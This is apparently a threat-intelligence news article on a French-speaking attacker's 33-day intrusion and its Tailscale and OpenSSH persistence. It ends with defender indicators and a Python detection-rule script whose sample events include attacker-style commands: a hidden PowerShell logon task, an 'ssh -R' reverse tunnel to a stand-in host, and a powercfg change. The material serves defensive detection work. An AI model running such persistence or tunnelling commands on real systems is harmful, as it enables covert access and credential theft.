Operation Poisson: A Junior Attacker's Persistent Backdoor Strategy Revealed
A recent analysis by **Cato Networks** has shed light on a persistent intrusion campaign, dubbed 'Operation Poisson,' where a French-speaking attacker compromised a small automotive business. The operation highlights a critical oversight in many incident response strategies: assuming that taking down a command-and-control server equates to full remediation. This attacker demonstrated how to maintain access long after the primary C2 infrastructure goes dark.

**Cato Networks**' **Cato CTRL** researcher **Vitaly Simonovich** meticulously documented the entire operation, capturing 339 commands over 33 days. This rare, keyboard-level view of an intrusion was made possible because the operator, known by the handle **Poisson**, left their **SSH** keys and a detailed playbook in an open storage bucket.
### The Attacker's Profile
**Poisson** is described not as an **APT**, but rather a junior operator. Their activity patterns, resembling a school schedule (active after 3 p.m. CET with a long midday gap), coupled with the use of free-tier services like **DuckDNS**, **Backblaze B2**, and a cheap **IONOS VPS** in Berlin, suggest a less sophisticated adversary. Despite thin tradecraft, including leaking their home directory multiple times and naming storage buckets after their handle, **Poisson** successfully compromised four machines.
### The Attack Chain
The initial compromise involved a highly evasive, memory-resident malware. A **VBScript** stager with a sandbox-evasion delay decrypted a **PowerShell** loader, which then pulled down a **.NET** loader to run **Havoc**'s **Demon** agent without writing it to disk. For privilege escalation, **Poisson** used `Start-Process -Verb RunAs`, which, notably, requires user interaction to bypass **UAC**.
After gaining initial access, the attacker established persistence through a scheduled task set to run at every logon with highest privileges, injected shellcode into `Explorer.exe`, and deployed a custom-built **RustDesk** instance as a backup channel. The primary objective was credential theft, achieved via a 70-line **Python** keylogger that wrote keystrokes to a local file. **Poisson** manually retrieved these files and used `powercfg` to prevent machines from sleeping, ensuring continuous data harvesting.
### The Critical Persistence Move
The pivotal moment of the operation occurred on April 7. In a five-hour overnight session, **Poisson** installed **OpenSSH Server** and **Tailscale** on a victim's machine. They then joined the machine to their private **Tailscale** network and configured key-based **SSH** with a reverse tunnel. This established a robust, encrypted connection to the victim's machine, independent of the **Havoc C2** and without exposing any ports.
The very next day, the **Havoc** infrastructure went offline. However, due to the established **Tailscale** path, **Poisson**'s access remained uninterrupted. When the **C2** resurfaced on April 26, the agents automatically reconnected, requiring no re-compromise. Over the subsequent five days, the attacker executed 145 more commands, probing smart-card and certificate stores, suggesting an interest in certificate-based logins. They also ran two unexplained executables from a file named `Thales.zip` for approximately 32 minutes before deleting 17 files and going quiet on May 1.
**Poisson**'s objectives were narrow: banking logins, email passwords, and government portal credentials. There was no evidence of **Mimikatz** usage, lateral movement, or ransomware deployment, nor any indication of document exfiltration despite browsing tax records and insurance files. For a small business, this direct financial exposure is a significant risk.
### Broader Implications and Detection
The tools utilized by **Poisson** are not novel. **China's APT31** has used **Tailscale** to tunnel out of Russian IT firms, and groups like **Scattered Spider** leverage legitimate remote-access tools such as **Ngrok** and **Fleetdeck**. **RustDesk**, **Poisson**'s backup, has also appeared in recent **Akira ransomware** intrusions. The key takeaway is that these legitimate, signed binaries often bypass traditional detection methods focused solely on malicious files, emphasizing the need for behavioral-based detection.
**Poisson**'s operation serves as command-level proof that a sophisticated persistence layer can outlast a **C2** takedown, even when implemented by a novice.
### Recommendations for Defenders
**Cato Networks** provides a concrete list of indicators to watch for:
* Alert on **OpenSSH Server** installations on **Windows** workstations, which are rarely legitimate.
* Monitor for `tailscale.exe` on machines that do not have a legitimate reason to run a **VPN**.
* Look for `ssh -R` reverse tunnels connecting to external hosts.
* Check for `wscript.exe` running **.vbs** files from user staging folders.
* Flag scheduled tasks configured with highest privileges that launch script interpreters.
* Watch for `powercfg` standby-timeout changes designed to keep machines awake.
* Block **DuckDNS**.
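As an added illustration, not part of Cato's report, the process-based indicators above expressed as simple detection rules in Python and run over constructed process-creation events (the `ProcEvent` fields and the `host_role` asset label are assumptions; the DuckDNS block is a network control and is not modelled here):

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon EID 1 / 4688 style); constructed fields."""
    image: str       # full path of the new process
    cmdline: str     # its command line
    host_role: str   # "workstation" or "server", from asset inventory (assumed label)

INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "cmd.exe", "python")

def _exe(e):
    return e.image.rsplit("\\", 1)[-1].lower()

def openssh_server_on_workstation(e):
    # sshd running, or the OpenSSH.Server capability being added, on a workstation
    cl = e.cmdline.lower()
    return e.host_role == "workstation" and (_exe(e) == "sshd.exe" or "openssh.server" in cl)

def tailscale_present(e):
    return _exe(e) in ("tailscale.exe", "tailscaled.exe")

def ssh_reverse_tunnel(e):
    # "-R <port>:host:port" remote forward; the port may be glued to the flag
    return _exe(e) == "ssh.exe" and re.search(r"\s-R\s*\d", e.cmdline) is not None

def vbs_from_user_staging(e):
    cl = e.cmdline.lower()
    staging = ("\\appdata\\", "\\downloads\\", "\\temp\\")
    return _exe(e) in ("wscript.exe", "cscript.exe") and ".vbs" in cl \
        and "\\users\\" in cl and any(s in cl for s in staging)

def highest_priv_task_with_interpreter(e):
    cl = e.cmdline.lower()
    return _exe(e) == "schtasks.exe" and "/rl highest" in cl and any(i in cl for i in INTERPRETERS)

def powercfg_standby_change(e):
    return _exe(e) == "powercfg.exe" and "standby-timeout" in e.cmdline.lower()

RULES = [openssh_server_on_workstation, tailscale_present, ssh_reverse_tunnel,
         vbs_from_user_staging, highest_priv_task_with_interpreter, powercfg_standby_change]

def scan(events):
    """Return (rule name, command line) for every event that matches a rule."""
    return [(r.__name__, e.cmdline) for e in events for r in RULES if r(e)]

# Constructed sample telemetry mirroring the article's indicators; not real captures.
SAMPLE = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\bob\AppData\Local\Temp\inv.vbs"', "workstation"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", 'schtasks /create /tn Upd /sc onlogon /rl highest /tr "powershell -w hidden -f C:\\Users\\bob\\u.ps1"', "workstation"),
    ProcEvent(r"C:\Windows\System32\powercfg.exe", "powercfg /change standby-timeout-ac 0", "workstation"),
    ProcEvent(r"C:\Program Files\Tailscale\tailscale.exe", "tailscale up --hostname ws01", "workstation"),
    ProcEvent(r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh -N -R 2222:localhost:22 op@vps.example", "workstation"),
    ProcEvent(r"C:\Windows\System32\OpenSSH\sshd.exe", "sshd.exe", "workstation"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", "notepad.exe report.txt", "workstation"),
    ProcEvent(r"C:\Windows\System32\OpenSSH\sshd.exe", "sshd.exe", "server"),  # expected on a server
]
```

Each rule is a starting point for a SIEM or EDR query; the `host_role` check is what keeps the OpenSSH rule from firing on servers where sshd is expected.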
Crucially, when a **C2** server is identified, security teams must assume it is not the sole access point. A thorough hunt for quiet persistence layers must be conducted. The unanswered question of what `Thales.zip` contained and its purpose underscores the broader point: the **C2** was merely one conduit, not the entire intrusion. Failure to address established backdoors like **OpenSSH**, **Tailscale**, scheduled tasks, and keyloggers leaves the door open for attackers, highlighting a critical gap in many remediation efforts.